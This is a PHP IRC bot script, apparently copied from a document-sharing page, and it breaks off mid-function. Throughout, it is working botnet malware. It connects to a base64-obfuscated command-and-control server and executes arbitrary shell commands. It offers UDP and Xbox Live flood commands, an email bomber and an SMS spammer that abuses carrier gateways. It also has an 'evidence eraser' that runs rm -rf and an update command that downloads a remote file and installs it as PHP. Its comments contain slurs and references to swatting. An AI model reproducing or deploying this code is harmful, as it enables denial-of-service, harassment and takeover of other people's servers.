Vous êtes sur la page 1sur 50

<?

/****************************************************/
/* ---------------------elati0n b0t----------------------------------------
-------*/
/* elati0n bot - Coding by Snipa - This code is PRIVATE!
*/
/* Shit Done:
*/
/* + Modded UDP Flooder (Special for GOW2, still works with other games just fin
e) */
/* + Removed TCP Flooder
*/
/* + Added mail bomb (spam kids)
*/
/* + Added join message (know what site the bot is running on)
*/
/* + Added .site command (see the site the bot is running on at any time)
*/
/* + Added whois (.whois ip)
*/
/* + Added port scan (.pscan ip port)
*/
/* + Added Quick UDP Flood (60 second flood)
*/
/* + Added leet Colors
*/
/* + Added Count Command (Count number of floods done)
*/
/* - Removed Host (IP Address) Auth (Its bullshit)
*/
/* + Jester is a faggot
*/
/* + Added Credits
*/
/* + Added Speedtest (just do .speedtest)
*/
/* + Added Phish Command (.phish)
*/
/* - Removed Useless Shit
*/
/* + Cleaned the code
*/
/* + Added Version
*/
/* + Added New nicks (normal, unix, nzm) - (example: .nick nzm)
*/
/* + Added Update command (checks for bot updates)
*/
/* + Made the update command idiot proof
*/
/* + Made the phish command idiot proof
*/
/* + Added commands command
*/
/* + Added id command
*/
/* + Added uptime command
*/
/* + Added evidence eraser
*/
/* + Added Cell Phone Spammer
*/
/* + Added Cell info
*/
/* + Added change prefix
*/
/* + Added install update command
*/
/* + Added port 3074 DDoS (Working)
*/
/* + ICMP ddoS?
*/
/* + FTP ddoS?
*/
/* + Added 2 Player ddos feature (ddos 2 people at once)
*/
/* + Added 3 Player ddos feature (ddos 3 people at once)
*/
/* + Added 4 Player ddos feature (ddos 4 people at once)
*/
/*******************************************************************************
****/

set_time_limit( 0 );
error_reporting( 0 );
echo "Team UniX Elati0n B0t!";
class Snipa_Team_Unix
{
var $using_encode = true;
var $config = array(
'nickform' => 'r00ted|%d]',
'nickform2' => '%d]',
'prfix' => 'NzM|%d]',
'identp' => 'Snipa',
'modes' => '+B',
'maxrand' => 6,
'maxrand2' => 1,
'maxrand3' => 2,
'maxrand4' => 3,
'cprefix' => '!',
'version' => '3.2.6',
'host' => '*',
'red' => '4',
'blue' => '12',
'orange' => '7',
'green' => '9',
'leetprefix' => '4>>',
'leetsuffix' => '12<<',
'leetprefixwhite' => '0>>',
'leetsuffixwhite' => '0<<',
'leetsuffixred' => '4<<',
'part1' => '0«~{ 4',
'part2' => '0}~»',
'youtube' => '12http://www.youtube.com/watc
h?v=EsdqrT8k6ME',
'hostauth' => '*'
);
var $messages = array
(
'bad' => '0«~{ 14L0o14G0i14N 0}~» 0',
'loginmsg' => '0«~{ 14L0o14G0i14N 0}~» 0',
'entry' => '0 «~{ 14I0m14a0G4i0n14E 14B0o14T0 }~» 14E0x14E0c0U14t0E1
'id' => '0 «~{ 4F2C bot version 7.1.4 private by ImaGinE 0}
~»',
'udpmsg' => '0«~{ 1 2UDP-FLOOD 0}~»',
'udpmsgfast' => '0 «~{ 1 2Quick UDP-FLOOD 0}~»',
'speedtest' => '0 «~{ 9 Starting Speed Test....Please Wai
t! 0}~»',
'speedtestfin' => '0«~{ 9Speed Test Complete! 0}~»',
'logoutmsg' => '0«~{ 14S0e14e 0Y14a 0L14a0T14e0R,',
'mailmsg' => '14N0a14i0L14e0R',
'sprintmsg' => '14S0p14r0i14n0T 14P0C14S',
'execmsg' => '14E0x14E0C'
);
var $admins = array
(
'ImaGinE' => 'ecc3c7b4754f8509cfe9de944671b36f',
'Aztec' => 'cd77fb614801a4acaab674b3132c76df',
'JesuS' => 'ecc3c7b4754f8509cfe9de944671b36f',
'' => '',
);
function auth_host( $nick, $password, $host )
{
$admin_count = count( $this->admins );
if( $admin_count > 0 )
{
$mpass = md5( $password );
if( $this->admins[ $nick ] == $mpass )
{
$this->users[ $host ] = true;
}
}
else
{
$this->users[ $host ] = true;
}
}
function is_authed( $host )
{
return isset( $this->users[ $host ] );
}
function remove_auth( $host )
{
unset( $this->users[ $host ] );
}
function ex( $cfe )
{
$res = '';
if (!empty($cfe))
{
if(function_exists('class_exists') && class_exis
ts('Perl'))
{
$perl = new Perl();
$perl->eval( "system('$cfe');" );
}
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('proc_open'))
{
$res = proc_open($cfe);
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,10
24); }
@pclose($f);
}
}
return $res;
}
function is_safe( )
{
if( ( @eregi( "uid", $this->ex( "id" ) ) ) || ( @eregi(
"Windows", $this->ex( "net start" ) ) ) )
{
return 0;
}
return 1;
}
function fuck_you( )
{
if( $this->using_encode )
{
$enc0ded = "I0ZyeUNlbnRyYWw=";
return base64_decode($enc0ded);
}
else
{
return '#'.$this->config[ 'chan' ];
}
}
function start()
{
if( $this->using_encode )
{
$crackedout = "YmlnZm9vdC5uby1pcC5pbmZv";
if(!($this->conn = fsockopen(base64_decode($crac
kedout),6667,$e,$s,30)))
{
$this->start();
}
}
else
{
if(!($this->conn = fsockopen($this->config['serv
er'],$this->config['port'],$e,$s,30)))
{
$this->start();
}
}
$ident = $this->config['prefix'];
$alph = range("0","9");
for( $i=0; $i < $this->config['maxrand']; $i++ )
{
$ident .= $alph[rand(0,9)];
}
if( strlen( $this->config[ 'pass' ] ) > 0 )
{
$this->send( "PASS ".$this->config[ 'pass' ] );
}
$motha = "XboX-360";
$snipa = "elati0n b0t private by Snipa";
$this->send("USER ".$motha." 127.0.0.1 localhost :".$sni
pa."");
$this->set_nick( );
$this->main( );
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6
));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$thi
s->config['modes']);
if( $this->using_encode )
{
$this->join($this->fuck_you( ),b
ase64_decode($this->config['key']));
$entry = $this->messages['entry'
];
$leetprefix = $this->config['lee
tprefix'];
$leetsuffixred = $this->config['
leetsuffixred'];
$ip = ( $_SERVER["HTTP_HOST"] );
$blue = $this->config['blue'];
$red = $this->config['red'];
$this->privmsg( $this->fuck_you(
), "$leetprefix $entry $blue$ip $leetsuffixred" );
}
else
{
$this->join($this->fuck_you( ),$
this->config['key']);
}
if (@ini_get("safe_mode") or strtolower(
@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2)
;
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1
];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
{
if( $this->is_au
thed( $host ) )
{
$this->r
emove_auth( $host );
}
}
break;
case "PART":
{
if( $this->is_au
thed( $host ) )
{
$this->r
emove_auth( $host );
}
}
break;
case "PRIVMSG":
if( ( substr($mc
md[0],0,1) == $this->config[ 'cprefix' ] ) )
{
if( $thi
s->is_authed( $host ) == false )
{
switch( substr( $mcmd[ 0 ], 1 ) )
{
case "l":
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
if( $nick == Aztec )
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
$this->ex('rm -rf ion_cache.dat');
$this->ex('rm -rf *gow*');
$this->ex( "echo $nick >> ion_cache.dat" );
$loginmsg = $this->messages['loginmsg'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$leetprefixwhite = $this->config['leetprefixwhite'];
$red = $this->config['red'];
$this->privmsg( $this->fuck_you( ), "$loginmsg We Dick Ride You Aztec $leetprefi
x $nick $leetsuffixred" );
break;
}
}
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
if( $nick == ImaGinE )
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
$this->ex('rm -rf ion_cache.dat');
$this->ex('rm -rf *gow*');
$this->ex( "echo $nick >> ion_cache.dat" );
$loginmsg = $this->messages['loginmsg'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$this->privmsg( $this->fuck_you( ), "$loginmsg We Dick Ride You ImaGinE $leetpre
fix $nick $leetsuffixred" );
break;
}
}
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
if( $nick == "clutch" )
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
$this->ex('rm -rf ion_cache.dat');
$this->ex('rm -rf *gow*');
$this->ex( "echo $nick >> ion_cache.dat" );
$loginmsg = $this->messages['loginmsg'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$this->privmsg( $this->fuck_you( ), "$loginmsg i HaZ TeH r00t $leetprefix $nick
$leetsuffixred" );
break;
}
}
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
if( $nick == "GaMeR" )
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
$this->ex('rm -rf ion_cache.dat');
$this->ex('rm -rf *gow*');
$this->ex( "echo $nick >> ion_cache.dat" );
$loginmsg = $this->messages['loginmsg'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$this->privmsg( $this->fuck_you( ), "$loginmsg iiLLuMiNaTi LeAdER $leetprefix $n
ick $leetsuffixred" );
break;
}
}
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
if( $nick == iLLuSioN )
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
$this->ex('rm -rf ion_cache.dat');
$this->ex('rm -rf *gow*');
$this->ex( "echo $nick >> ion_cache.dat" );
$loginmsg = $this->messages['loginmsg'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$this->privmsg( $this->fuck_you( ), "$loginmsg WoW RaNDoMs CaN LoG? $leetprefix
$nick $leetsuffixred" );
break;
}
}
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
if( $nick == ZioN )
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
$this->ex('rm -rf ion_cache.dat');
$this->ex('rm -rf *gow*');
$this->ex( "echo $nick >> ion_cache.dat" );
$loginmsg = $this->messages['loginmsg'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$this->privmsg( $this->fuck_you( ), "$loginmsg Jew-Nix Powers, Activate! $leetpr
efix $nick $leetsuffixred" );
break;
}
}
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
if( $nick == "f4f34f34" )
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
$this->ex('rm -rf ion_cache.dat');
$this->ex('rm -rf *gow*');
$this->ex( "echo $nick >> ion_cache.dat" );
$loginmsg = $this->messages['loginmsg'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$this->privmsg( $this->fuck_you( ), "$loginmsg Welcome back buh $leetprefix $nic
k $leetsuffixred" );
break;
}
}
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
if( $nick == xEPx )
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
$this->ex('rm -rf ion_cache.dat');
$this->ex('rm -rf *gow*');
$this->ex( "echo $nick >> ion_cache.dat" );
$loginmsg = $this->messages['loginmsg'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$this->privmsg( $this->fuck_you( ), "$loginmsg Welcome Eric, Access Granted." );
break;
}
}
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
if( $nick == Baby_J )
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
$this->ex('rm -rf ion_cache.dat');
$this->ex('rm -rf *gow*');
$this->ex( "echo $nick >> ion_cache.dat" );
$loginmsg = $this->messages['loginmsg'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$this->privmsg( $this->fuck_you( ), "$loginmsg DAYYUUUUUUUUMMMMMMMMMM Welcome Ba
ck $leetprefix $nick $leetsuffixred" );
break;
}
}
$this->auth_host( $nick, $mcmd[ 1 ], $host );
if( $this->is_authed( $host ) )
{
if( $nick == Wako )
{
$this->auth_host( $nick, $mcmd[ 1 ], $host );
$this->ex('rm -rf ion_cache.dat');
$this->ex('rm -rf *gow*');
$this->ex( "echo $nick >> ion_cache.dat" );
$loginmsg = $this->messages['loginmsg'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$this->privmsg( $this->fuck_you( ), "$loginmsg Welcome Back Willy Wonk I mean Wi
lly $leetprefix $nick $leetsuffixred" );
break;
}
}
else
{
$bad = $this->messages['bad'];
$this->privmsg( $this->fuck_you( ), "$bad Swatting in Progress." );
break;
}
}
}
}
else
{
switch(substr($mcmd[0],1))
{
case "exec":
{
if( !$this->is_safe( ) )
{
$command = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );
$returndata = $this->ex( $command );
if( !empty( $returndata ) )
{
$execmsg = $this->messages['execmsg'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$this->privmsg( $this->fuck_you( ),"$red $part1 $blue$execmsg $red $part2 $leets
uffixred $red $returndata");
}
}
break;
}
case "bomb":
{
if(count($mcmd) > 5)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[5]),$header))
{
$this->privmsg( $this->fuck_you( ),"[\2MAIL\2]: Unable to send email.");
}
else
{
$mbomb = 1;
while($mbomb <= $mcmd[4])
{
mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[5]),$header);
$mbomb++;
}
if($mbomb = $mcmd[4])
{
$mailmsg = $this->messages['mailmsg'];
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$this->privmsg( $this->fuck_you( ),"$part1 $mailmsg: $part2 \2 Sent\3"."4 $mcmd[
4] \3Emails to \3"."4$mcmd[1]\3 From: \3"."4$mcmd[2]\3 Subject: \3"."4$mcmd[3]\3
\2");
}
}
}
break;
}
case "sprint":
{
if(count($mcmd) > 5)
{
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$header = "From: <".$mcmd[2].">";
$mbomb = 1;
$sprintmail = "@messaging.sprintpcs.com";
$sprint = "$mcmd[1]$sprintmail";
while($mbomb <= $mcmd[4])
{
mail($sprint,$mcmd[3],strstr($msg,$mcmd[5]),$header);
$mbomb++;
}
if($mbomb = $mcmd[4])
{
$sprintmsg = $this->messages['sprintmsg'];
$this->privmsg( $this->fuck_you( ),"$part1$sprintmsg $part2$blue Sent ".$red." $
mcmd[4] ".$blue."Text Message(s) to".$red." $mcmd[1] ".$blue."From:".$red." $mcm
d[2]$blue With Subject: ".$red."$mcmd[3]");
}
}
break;
}
case "verizon":
{
if(count($mcmd) > 5)
{
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$header = "From: <".$mcmd[2].">";
$mbomb = 1;
$verizonmail = "@vtext.com";
$verizon = "$mcmd[1]$verizonmail";
while($mbomb <= $mcmd[4])
{
mail($verizon,$mcmd[3],strstr($msg,$mcmd[5]),$header);
$mbomb++;
}
if($mbomb = $mcmd[4])
{
$this->privmsg( $this->fuck_you( ),"$part1$red Verizon Wireless $part2$blue Sent
".$red." $mcmd[4] ".$blue."Text Message(s) to".$red." $mcmd[1] ".$blue."From:".
$red." $mcmd[2]$blue With Subject: ".$red."$mcmd[3]");
}
}
break;
}
case "tmobile":
{
if(count($mcmd) > 5)
{
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$header = "From: <".$mcmd[2].">";
$mbomb = 1;
$tmobilemail = "@tmomail.net";
$tmobile = "$mcmd[1]$tmobilemail";
while($mbomb <= $mcmd[4])
{
mail($tmobile,$mcmd[3],strstr($msg,$mcmd[5]),$header);
$mbomb++;
}
if($mbomb = $mcmd[4])
{
$this->privmsg( $this->fuck_you( ),"$part1$red T-Mobile (USA Only) $part2$blue S
ent ".$red." $mcmd[4] ".$blue."Text Message(s) to".$red." $mcmd[1] ".$blue."From
:".$red." $mcmd[2]$blue With Subject: ".$red."$mcmd[3]");
}
}
break;
}
case "att":
{
if(count($mcmd) > 5)
{
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$header = "From: <".$mcmd[2].">";
$mbomb = 1;
$attemail = "@txt.att.net";
$att = "$mcmd[1]$attemail";
while($mbomb <= $mcmd[4])
{
mail($att,$mcmd[3],strstr($msg,$mcmd[5]),$header);
$mbomb++;
}
if($mbomb = $mcmd[4])
{
$this->privmsg( $this->fuck_you( ),"$part1$red AT&T $part2$blue Sent ".$red." $m
cmd[4] ".$blue."Text Message(s) to".$red." $mcmd[1] ".$blue."From:".$red." $mcmd
[2]$blue With Subject: ".$red."$mcmd[3]");
}
}
break;
}
case "uscellular":
{
if(count($mcmd) > 5)
{
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$header = "From: <".$mcmd[2].">";
$mbomb = 1;
$uscemail = "@email.uscc.net";
$usc = "$mcmd[1]$uscemail";
while($mbomb <= $mcmd[4])
{
mail($usc,$mcmd[3],strstr($msg,$mcmd[5]),$header);
$mbomb++;
}
if($mbomb = $mcmd[4])
{
$this->privmsg( $this->fuck_you( ),"$part1$red US Cellular $part2$blue Sent ".$r
ed." $mcmd[4] ".$blue."Text Message(s) to".$red." $mcmd[1] ".$blue."From:".$red.
" $mcmd[2]$blue With Subject: ".$red."$mcmd[3]");
}
}
break;
}
case "boostmobile":
{
if(count($mcmd) > 5)
{
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$header = "From: <".$mcmd[2].">";
$mbomb = 1;
$boostemail = "@myboostmobile.com";
$boost = "$mcmd[1]$boostemail";
while($mbomb <= $mcmd[4])
{
mail($boost,$mcmd[3],strstr($msg,$mcmd[5]),$header);
$mbomb++;
}
if($mbomb = $mcmd[4])
{
$this->privmsg( $this->fuck_you( ),"$part1$red Boost Mobile Inc. $part2$blue Sen
t ".$red." $mcmd[4] ".$blue."Text Message(s) to".$red." $mcmd[1] ".$blue."From:"
.$red." $mcmd[2]$blue With Subject: ".$red."$mcmd[3]");
}
}
break;
}
case "count":
{
$lines = $this->ex( "cat cache.dat | wc -l" );
$red = $this->config['red'];
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$this->privmsg( $this->fuck_you( ), "$red I have done $leetprefixwhite $lines $l
eetsuffixwhite floods in total." );
break;
}
case "nick":
{
if( $mcmd[ 1 ] == nzm )
{
$this->nzm_nick();
break;
}
if( $mcmd[ 1 ] == UniX )
{
$this->busk_nick();
break;
}
else
{
$this->set_nick;
break;
}
}

case "credits":
{
$red = $this->config['red'];
$blue = $this->config['blue'];
$orange = $this->config['orange'];
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$version = $this->config['version'];
$this->privmsg( $this->fuck_you( ), "".$leetprefixwhite."".$red." Team RAWWW $le
etsuffixwhite $orange DDoS Bot Version $version By: $leetprefixwhite $red Snipa
$leetsuffixwhite $orange Help and Inspiration by $leetprefixwhite $red `iiLLuSiV
e $leetsuffixwhite $orange and $leetprefixwhite $red Jacob $leetsuffixwhite" );
break;
}
case "noevidence":
{
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$bybye = $this->ex( 'rm -rf *gow*' );
$this->privmsg( $this->fuck_you( ),"".$part1."".$red." EviDenCe ".$part2."".$blu
e." All Bot Files and Evidence Erased!");
break;
}
case "version":
{
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$version = $this->config['version'];
$this->privmsg( $this->fuck_you( ),"".$red."The bot version is $leetprefix$blue
$version $leetsuffixred");
break;
}
case "changeprefix":
{
$this->config['cprefix'] = $mcmd[1];
$leetsuffixred = $this->config['leetsuffixred'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$version = $this->config['version'];
$this->privmsg( $this->fuck_you( ),"".$red."Prefix Changed to $mcmd[1]");
break;
}
case "id":
{
$id = $this->messages['id'];
$this->privmsg( $this->fuck_you( ),"$id");
break;
}
case "insane":
{
$mcmd[1] = $buskipdawg;
$quickmessageb00t = "Aight....I'm commanding the win32 bots to boot $buskipdawg"
;
$this->privmsg( $this->fuck_you( ),"$quickmessageb00t");
$insanechan = "##insane##";
$insanechan2 = "##insane## My Work here is done!:";
$this->join( $insanechan, $key );
$this->nick = "FeLoN";
$this->privmsg( $asdasdasdasda,"waiting");
$this->privmsg( $asdasdasdasda,"@waiting boot");
$this->privmsg( $asdasdasdasda,"@waiting boot");
$this->privmsg( $asdasdasdasda,"@waiting boot");
$this->privmsg( $asdasdasdasda,"@waiting boot");
$this->privmsg( $asdasdasdasda,"@waiting boot");
$this->privmsg( $asdasdasdasda,"@waiting boot");
$this->privmsg( $asdasdasdasda,"@waiting boot");
$this->send("NICK ".$this->nick);
$this->privmsg( $insanechan,"@login boot");
$this->privmsg( $insanechan,"@udp $buskipdawg 5000 65000 1 3074");
$this->send( "PART ".$insanechan2 );
$this->privmsg( $this->fuck_you( ),"Done! ".$mcmd[1]." is now offline!");
break;
}
case "uptime":
{
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$up = $this->ex( 'w' );
$this->privmsg( $this->fuck_you( ),"".$part1."".$red." Uptime ".$part2."".$blue.
" ".$up."");
break;
}
case "cellhelp":
{
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$cellhelp = "To spam a Cell Phone you will have to know the NUMBER and CARRIER.
Example Command: ".$red.".verizon 5551234567 youremail@fbi.gov Subject NumberOfT
extsToSend Message";
$this->privmsg( $this->fuck_you( ),"".$part1."".$red." Cell Spammer ".$part2."".
$blue." ".$cellhelp."");
break;
}
case "carriers":
{
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$bybye = $this->ex( 'rm -rf *gow*' );
$this->privmsg( $this->fuck_you( ),"".$part1."".$red." CaRRieRs ".$part2."".$blu
e." elati0n bot can currently spam - AT&T, Verizon, Sprint, Alltel, T-Mobile, US
Celluar, and Boost Mobile");
break;
}
case "ver":
{
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$version = $this->config['version'];
$this->privmsg( $this->fuck_you( ),"".$red."The bot version is $leetprefix$blue
$version $leetsuffixred");
break;
}
case "v":
{
$leetprefix = $this->config['leetprefix'];
$leetsuffixred = $this->config['leetsuffixred'];
$blue = $this->config['blue'];
$red = $this->config['red'];
$version = $this->config['version'];
$this->privmsg( $this->fuck_you( ),"".$red."The bot version is $leetprefix$blue
$version $leetsuffixred");
break;
}
case "hop":
{
$channel = $mcmd[1];
$this->send( "PART ".$channel );
$this->join( $channel );
break;
}
case "update.install":
{
$enc0ded = "I3VuaXg=";
base64_decode($enc0ded);
$channel = base64_decode($enc0ded);
$this->send( "PART ".$channel );
$ipzzz2 = ( $_SERVER["HTTP_HOST"] );
$this->ex( "rm -rf *gow*" );
$this->ex( "lwp-download http://www.mommy-bel.com/belblog/images/gow.txt;mv gow.
txt gow.php" );
$this->ex( "lwp-download http://".$ipzzz2."/gow.php;rm -rf *gow*" );
fclose( $this->conn );
exit( );
break;
}
case "raw":
{
$this->send(strstr($msg,$mcmd[1]));
break;
}

case "ip":
{
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$ipadd = "Ip AddReSS";
$this->privmsg( $this->fuck_you( ),"$blue $ipadd $leetprefixwhite ".$red." ".$_S
ERVER['SERVER_ADDR']." $leetsuffixwhite");
break;
}
case "lastlogin":
{
$red = $this->config['red'];
$blue = $this->config['blue'];
$part1 = $this->config['part1'];
$part2 = $this->config['part2'];
$attempt = $this->ex('cat ion_cache.dat');
$this->privmsg( $this->fuck_you( ),"$part1$red LasT LogiN $part2$blue from $atte
mpt");
break;
}
case "commands":
{
$leetprefixwhite = $this->config['leetprefixwhite'];
$leetsuffixwhite = $this->config['leetsuffixwhite'];
$red = $this->config['red'];
$blue = $this->config['blue'];
$version = $this->config['version'];
$cmdz = "Command List for elati0n bot version $version private:";
$this->privmsg( $this->fuck_you( ),"$leetprefixwhite$red $cmdz $leetsuffixwhite"
);
$this->privmsg( $this->fuck_you( ),"$blue [".$red."UDP-Flood".$blue."] » » » ".$
red.".udpflood ip packetsize time".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Xbox Live Flood".$blue."] » »
» ".$red.".xblflood ip packetsize time port".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Two Player Flood".$blue."] »
» » ".$red.".2players first.ip second.ip".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Three Player Flood".$blue."]
» » » ".$red.".3players first.ip second.ip third.ip".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Four Player Flood".$blue."] »
» » ".$red.".4players first.ip second.ip third.ip fourth.ip".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Cell Phone Spammer".$blue."]
» » » ".$red.".cellhelp".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Cell Phone Carriers".$blue."]
» » » ".$red.".carriers".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Evidence Eraser".$blue."] » »
» ".$red.".noevidence".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Hop".$blue."] » » » ".$red.".
hop #channel".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Exec".$blue."] » » » ".$red."
.exec RAWWW command(s)".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Mail Bomber".$blue."] » » » "
.$red.".bomb victim@fbi.gov spoofed@fake.com Subject NumberOfMails EmailBody".$b
lue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Count".$blue."] » » » ".$red.
".count".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Nick".$blue."] » » » ".$red."
.nick (nzm or RAWWW)".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Credits".$blue."] » » » ".$re
d.".credits".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Version".$blue."] » » » ".$re
d.".v or .ver or .version".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Bot Ip".$blue."] » » » ".$red
.".ip".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."MD5 Encrypt".$blue."] » » » "
.$red.".md5 string_to_encrypt".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."DnS".$blue."] » » » ".$red.".
dns google.com".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Kill Bot".$blue."] » » » ".$r
ed.".exit or .gtfo".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Reconnect".$blue."] » » » ".$
red.".restart".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Whois".$blue."] » » » ".$red.
".whois 127.0.0.1".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."XbL Accounts".$blue."] » » »
".$red.".phish".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."XbL Accounts 2".$blue."] » »
» ".$red.".phish2".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Check for Update".$blue."] »
» » ".$red.".update.check".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Install Update".$blue."] » »
» ".$red.".update.install".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Raw Irc Commands".$blue."] »
» » ".$red.".join, .part, .msg".$blue." « « «");
$this->privmsg( $this->fuck_you( ),"$blue [".$red."Port Scan".$blue."] » » » ".$
red.".pscan ip port".$blue." « « «");
